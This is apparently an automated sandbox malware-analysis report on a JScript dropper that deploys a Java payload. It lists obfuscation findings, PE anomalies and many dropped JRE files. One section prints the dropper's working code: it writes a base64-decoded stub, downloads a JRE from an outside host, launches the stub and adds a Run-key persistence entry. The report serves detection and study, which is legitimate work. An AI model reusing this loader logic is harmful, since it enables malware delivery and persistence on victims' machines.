Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\jre-image\bin\javaws.pdb source: xcopy.exe, 00000012.00000003.1809259600.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libmlib_image\mlib_image.pdbMM source: xcopy.exe, 00000012.00000003.1833250324.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\eula\obj\eula.pdb source: xcopy.exe, 00000012.00000003.1791314402.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\Release\CryptUtil.pdbP8PP@Y source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

JScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: WScript.CreateObject("WScript.Shell");var tempdir = wshShell.ExpandEnvironmentStrings("%temp%");var appdatadir = wshShell.ExpandEnvironmentStrings("%appdata%");var r = Math.random().toString(36).replace(/[^a-z]+/g, '').substr(0, 10);var stubpath = appdatadir + "\\" + r + ".txt"var decoded = decodeBase64(longText);writeBytes(stubpath, decoded);var fso = WScript.CreateObject("Scripting.FileSystemObject");var text = "";try{text = wshShell.RegRead("HKLM\\SOFTWARE\\Wow6432Node\\JavaSoft\\Java Runtime Environment\\CurrentVersion");text = wshShell.RegRead("HKLM\\SOFTWARE\\Wow6432Node\\JavaSoft\\Java Runtime Environment\\" + text + "\\JavaHome");}catch(err){}try{if(text == ""){text = wshShell.RegRead("HKLM\\SOFTWARE\\JavaSoft\\Java Runtime Environment\\CurrentVersion");text = wshShell.RegRead("HKLM\\SOFTWARE\\JavaSoft\\Java Runtime Environment\\" + text + "\\JavaHome");if(text != ""){text = text + "\\bin\\javaw.exe";}}else{text = text + "\\bin\\javaw.exe";}}catch(err){}try{if(text != ""){//wshShell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ntfsmgr", "\"" + text + "\" -jar \"" + stubpath + "\"", "REG_SZ");wshShell.run("\"" + text + "\" -jar \"" + stubpath + "\"");} else{GrabJreFromNet();}} catch(err){}function GrabJreFromNet(){do{try{var xHttp = WScript.CreateObject("msxml2.serverxmlhttp.6.0");var bStrm = WScript.CreateObject("Adodb.Stream");xHttp.open("GET", "http://wshsoft.company/jv/jrex.zip", false);xHttp.setOption(2, 13056);xHttp.send();bStrm.Type = 1;bStrm.open();bStrm.write(xHttp.responseBody);bStrm.savetofile(appdatadir + "\\jre.zip", 2);break;}catch(err){WScript.Sleep(5000);}}while(true);UnZip(appdatadir + "\\jre.zip", appdatadir + "\\jre7");//wshShell.RegWrite("HKLM\\SOFTWARE\\JavaSoft\\Java Runtime Environment\\CurrentVersion", "1.8", "REG_SZ");//wshShell.RegWrite("HKLM\\SOFTWARE\\JavaSoft\\Java Runtime Environment\\1.8\\JavaHome", appdatadir + "\\jre7", "REG_SZ");wshShell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ntfsmgr", "\"" + appdatadir + "\\jre7\\bin\\javaw.exe\" -jar " + "\"" + stubpath + "\"", "REG_SZ");wshShell.run("\"" + appdatadir + "\\jre7\\bin\\javaw.exe\" -jar " + "\"" + stubpath + "\"");}function decodeBase64(base64){var DM = WScript.CreateObject("Microsoft.XMLDOM");var EL = DM.createElement("tmp");EL.dataType = "bin.base64";EL.text = base64;return EL.nodeTypedValue;}function writeBytes(file, bytes){var binaryStream = WScript.CreateObject("ADODB.Stream");binaryStream.Type = 1;binaryStream.Open();binaryStream.Write(bytes);binaryStream.SaveToFile(file, 2);}function UnZip(zipfile, ExtractTo){if(fso.GetExtensionName(zipfile) == "zip"){if(!fso.FolderExists(ExtractTo)){fso.CreateFolder(ExtractTo);}var objShell = WScript.CreateObject("Shell.Application");var destination = objShell.NameSpace(ExtractTo);var zip_content = objShell.NameSpace(zipfile).Items(); for(i = 0; i < zip_content.Count; i++){if(fso.FileExists(fso.Buildpath(ExtractTo,zip_content.item(i).name)+"."+fso.getExtensionName

Binary contains a suspicious time stamp

Source: msvcp140.dll.18.dr

Static PE information: 0xEDEDFA22 [Fri Jun 29 08:17:38 2096 UTC]

Contains functionality to dynamically determine API calls

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

Code function: 1_2_6EEF45FB LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

1_2_6EEF45FB

JavaScript source code contains large arrays or strings with random content potentially encoding malicious code

Source: gcahfpmhcn.js

String : entropy: 5.54, length: 1028756, content: 'dmFy{2}G5lbTQ0Ow0KdmFy{2}GxvbmdUZX{0}0{2}D0g{2}lVFc0{1}CQlEtPCNDLTwjZ0ktPCNMcGVqbGctPCMtPCMtPCMtPCM

Go to definition

PE file contains sections with non-standard names

Source: unpack200.exe.18.dr

Static PE information: section name: .00cfg

Uses code obfuscation techniques (call, push, ret)

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 1_2_6EEF2E75 push ecx; ret	1_2_6EEF2E88
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 1_2_020D8A11 push cs; retf	1_2_020D8A31
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 1_2_020DD7EC push es; retn 0001h	1_2_020DD8FF
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 1_2_020E2848 push es; retn 0024h	1_2_020E284B
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 1_2_020DD86F push es; retn 0001h	1_2_020DD8FF
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 1_2_0203D8F7 push 00000000h; mov dword ptr [esp], esp	1_2_0203D921
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 1_2_0203A20A push ecx; ret	1_2_0203A21A
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 1_2_0203A21B push ecx; ret	1_2_0203A225
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 1_2_0203BB67 push 00000000h; mov dword ptr [esp], esp	1_2_0203BB8D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 1_2_0203B3B7 push 00000000h; mov dword ptr [esp], esp	1_2_0203B3DD
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 1_2_0203D8E0 push 00000000h; mov dword ptr [esp], esp	1_2_0203D921
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 1_2_0203B947 push 00000000h; mov dword ptr [esp], esp	1_2_0203B96D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 1_2_0203C477 push 00000000h; mov dword ptr [esp], esp	1_2_0203C49D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Code function: 4_3_1524A5AC pushad ; iretd	4_3_1524A5AD
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Code function: 4_3_1524A5AC pushad ; iretd	4_3_1524A5AD
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Code function: 4_3_1524DE91 push ss; iretd	4_3_1524DE96
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Code function: 4_3_1524DE91 push ss; iretd	4_3_1524DE96
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Code function: 4_3_1524A5AC pushad ; iretd	4_3_1524A5AD
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Code function: 4_3_1524A5AC pushad ; iretd	4_3_1524A5AD
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Code function: 4_3_1524DE91 push ss; iretd	4_3_1524DE96
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Code function: 4_3_1524DE91 push ss; iretd	4_3_1524DE96
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Code function: 4_2_0276BE7B push cs; retf	4_2_0276BEF1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Code function: 4_2_0276BDDD push ebx; retf	4_2_0276BE7A
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Code function: 4_2_0276BDD8 push ebx; retf	4_2_0276BE7A
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Code function: 4_2_026CD8F7 push 00000000h; mov dword ptr [esp], esp	4_2_026CD921
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Code function: 4_2_026CA20A push ecx; ret	4_2_026CA21A
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Code function: 4_2_026CA21B push ecx; ret	4_2_026CA225
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Code function: 4_2_026CBB67 push 00000000h; mov dword ptr [esp], esp	4_2_026CBB8D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Code function: 4_2_026CB3B7 push 00000000h; mov dword ptr [esp], esp	4_2_026CB3DD
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Code function: 4_2_026CD8E0 push 00000000h; mov dword ptr [esp], esp	4_2_026CD921
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Code function: 4_2_026CB947 push 00000000h; mov dword ptr [esp], esp	4_2_026CB96D

Drops PE files

Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\ktab.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\klist.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-errorhandling-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\API-MS-Win-core-xstate-l2-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\java_crw_demo.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\ssvagent.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\servertool.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\dt_shmem.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\w2k_lsa_auth.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\prism_sw.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\tnameserv.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\awt.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jabswitch.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jjs.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-debug-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\bci.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\deployJava1.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140_1.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\deploy.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\fontmanager.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\prism_common.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\sunec.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\sunmscapi.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\policytool.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\java.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\gstreamer-lite.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-console-l1-2-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\orbd.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\unpack.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\verify.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	File created: C:\Users\user\AppData\Local\Temp\Windows197633722729995093.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\JavaAccessBridge-32.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\management.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\j2pcsc.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\dt_socket.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jpeg.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\hprof.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\eula.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\zip.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-private-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140_2.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\client\jvm.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\pack200.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\mlib_image.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\kinit.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\java.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jfxwebkit.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\npjp2.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jawt.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\npdeployJava1.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\net.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\lcms.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\j2gss.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\sspi_bridge.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\ucrtbase.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\prism_d3d.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-console-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jfxmedia.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2launcher.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\t2k.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\glass.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\java-rmi.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\resource.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-datetime-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jdwp.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jaas_nt.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\splashscreen.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\decora_sse.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\msvcp140.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\keytool.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\wsdetect.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\j2pkcs11.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2native.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\npt.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jfr.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\unpack200.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\dcpr.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_iio.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jsdt.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\fxplugins.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\glib-lite.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\WindowsAccessBridge-32.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\instrument.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jsound.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\rmiregistry.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\JAWTAccessBridge-32.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2iexp.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2ssv.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\javaws.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\ssv.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.cpl	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jsoundds.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
